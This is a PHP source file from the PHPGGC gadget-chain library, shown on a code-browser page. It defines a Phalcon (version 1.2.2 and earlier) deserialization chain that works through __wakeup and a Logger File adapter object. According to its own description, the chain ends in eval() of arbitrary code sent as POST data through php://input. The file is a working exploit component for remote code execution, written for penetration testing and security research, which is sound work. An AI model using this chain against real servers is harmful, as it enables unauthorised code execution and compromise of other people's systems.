Codebase list phpggc / d89026c5-ddf4-439a-b882-0a351c2603e1/main gadgetchains / Phalcon / RCE / 1 / chain.php
d89026c5-ddf4-439a-b882-0a351c2603e1/main

Tree @d89026c5-ddf4-439a-b882-0a351c2603e1/main (Download .tar.gz)

chain.php @d89026c5-ddf4-439a-b882-0a351c2603e1/mainraw · history · blame

<?php

namespace GadgetChain\Phalcon;

class RCE1 extends \PHPGGC\GadgetChain\RCE
{
    public static $version = '<= 1.2.2';
    public static $vector = '__wakeup';
    public static $author = 'Raz0r';
    public static $information = '
        This chain does not expect parameters, will eval() any code supplied in 
        php://input (i.e. POST data). Requires allow_url_include = true.
    ';

    # No parameters expected
    public static $parameters = [];

    public function generate(array $parameters)
    {
        return new \Phalcon\Logger\Adapter\File();
    }
}